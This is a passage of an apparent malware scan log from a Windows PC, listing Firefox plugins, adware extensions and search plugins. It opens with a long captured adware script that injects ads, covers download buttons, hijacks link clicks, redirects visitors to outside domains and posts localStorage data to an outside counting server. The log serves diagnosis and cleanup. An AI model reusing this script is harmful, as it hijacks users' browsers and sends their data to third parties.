[777,size]);}}catch(e){return !1;}},matomy_adj_21_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2432859\",\"300x250\":\"2432857\",\"160x600\":\"2432865\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [778,size]);}}catch(e){return !1;}},adstract_new_t3_24_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2433000&size=+size+' (atp?atp:1), [782,size]);}}catch(e){return !1;}},yashi_apx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2422901\",\"300x250\":\"2422900\",\"728x90\":\"2422902\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [785,size]);}}catch(e){return !1;}},baba_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2431150\",\"300x250\":\"2431153\",\"160x600\":\"2431154\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [786,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size=+size+&referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},mari_strm15:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2399328\",\"300x250\":\"2399329\",\"728x90\":\"2399330\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [750,size]);}}catch(e){return !1;}},mari_strm15_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2399331\",\"300x250\":\"2399332\",\"728x90\":\"2399333\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [751,size]);}}catch(e){return !1;}},web3_strm5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2400822&size=+size+' (atp?atp:1), [754,size]);}}catch(e){return !1;}},matomy_strm20:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2432900\",\"160x600\":\"2432903\",\"300x250\":\"2432893\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [779,size]);}}catch(e){return !1;}},matomy_strm20_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2432904\",\"300x250\":\"2432899\",\"728x90\":\"2432902\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [780,size]);}}catch(e){return !1;}},adstract_strm_t3_24_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2433019&size=+size+' (atp?atp:1), [783,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"KxccQXsm=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"KxccQXsm=\")){var d=a.match(/KxccQXsm=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ejShVWzmPhd9HrjaMCyVUojw8rHUMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0qTk7rHY7qdaHrTsGqjwGqdkEra==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='VN'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"64.96\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");

FF - prefs.js..keyword.URL: "http://www.bigseekpr...2441E553C0}?q="

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_8_800_94.dll File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_94.dll ()

FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll (Adobe Systems, Inc.)

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

FF - HKLM\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Sony Online Entertainment\npsoe.dll ()

FF - HKLM\Software\MozillaPlugins\@t.garena.com/garenatalk: C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Temp\Rar$EXa0.497\LienMinhHuyenThoai\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll File not found

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKLM\Software\MozillaPlugins\@zing.vn/ZingPlay-WebControl-1,version=1.0.1: C:\Program Files\VinaGame\ZingPlay\npWebActivater.dll (VNG Corp.)

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)

FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}: C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\ [2012.02.22 23:26:23 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Alwil Software\Avast5\WebRep\FF [2009.01.05 05:40:01 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013.05.07 23:11:15 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013.11.11 12:39:20 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.11.11 12:39:20 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013.05.07 23:11:15 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\PasswordBox\Firefox [2013.09.10 16:57:18 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013.09.15 20:07:19 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\SeaMonkey\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013.09.15 20:07:19 | 000,000,000 | ---D | M]

[2011.10.30 21:11:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Extensions

[2011.10.30 21:11:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Extensions\[email protected]

[2013.05.07 23:11:15 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Extensions

[2013.05.07 23:11:15 | 000,000,000 | ---D | M] (Mozilla hotfix) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Extensions\MozillaHotfix

[2014.06.25 18:36:59 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions

[2014.03.24 22:13:50 | 000,000,000 | ---D | M] (Yahoo! Toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}

[2013.04.26 02:19:15 | 000,000,000 | ---D | M] (Hao123 toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{97A78363-B868-4B48-AC91-A783A31215AF}

[2012.02.18 00:05:05 | 000,000,000 | ---D | M] ("Free YouTube Download (Free Studio) Menu") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}

[2014.01.12 22:05:14 | 000,000,000 | ---D | M] ("MySearchDial NewTab") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}

[2014.03.24 22:12:21 | 000,000,000 | ---D | M] ("VisualBee") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com

[2014.03.24 22:07:07 | 000,000,000 | ---D | M] (savenshAriE) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2013.04.26 21:49:48 | 000,000,000 | ---D | M] (Delta Toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.01.12 22:05:11 | 000,000,000 | ---D | M] (mysearchdial.com) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.03.24 22:07:07 | 000,000,000 | ---D | M] (SearchNewTab) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.03.24 22:07:11 | 000,000,000 | ---D | M] (Soearachh-NewTiaabi) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2013.04.26 21:49:39 | 000,000,000 | ---D | M] (Yontoo) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.03.24 22:07:15 | 000,000,000 | ---D | M] (contaiynuettosaovve) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.03.24 22:07:15 | 000,000,000 | ---D | M] (greaTsavear) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]

[2014.03.24 22:12:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData

[2014.03.24 22:12:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData\plugins

[2014.03.24 22:12:19 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData\userCode

[2014.03.24 22:13:43 | 000,050,738 | ---- | M] () (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\extensions\[email protected]

[2013.06.02 18:31:45 | 000,006,503 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\babylon.xml

[2013.06.02 18:31:45 | 000,006,503 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\BrowserProtect.xml

[2013.06.02 18:32:01 | 000,001,294 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\delta.xml

[2014.03.24 22:07:26 | 000,002,399 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\Mysearchdial.xml

[2013.05.08 21:37:14 | 000,002,047 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\passwordbox.xml

[2009.01.05 05:31:56 | 000,001,977 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\search-here.xml

[2014.03.24 22:07:30 | 000,000,329 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\search.xml

[2014.03.24 22:13:44 | 000,001,386 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\smartbar.xml

[2014.03.24 22:07:26 | 000,007,852 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\WebSearch.xml

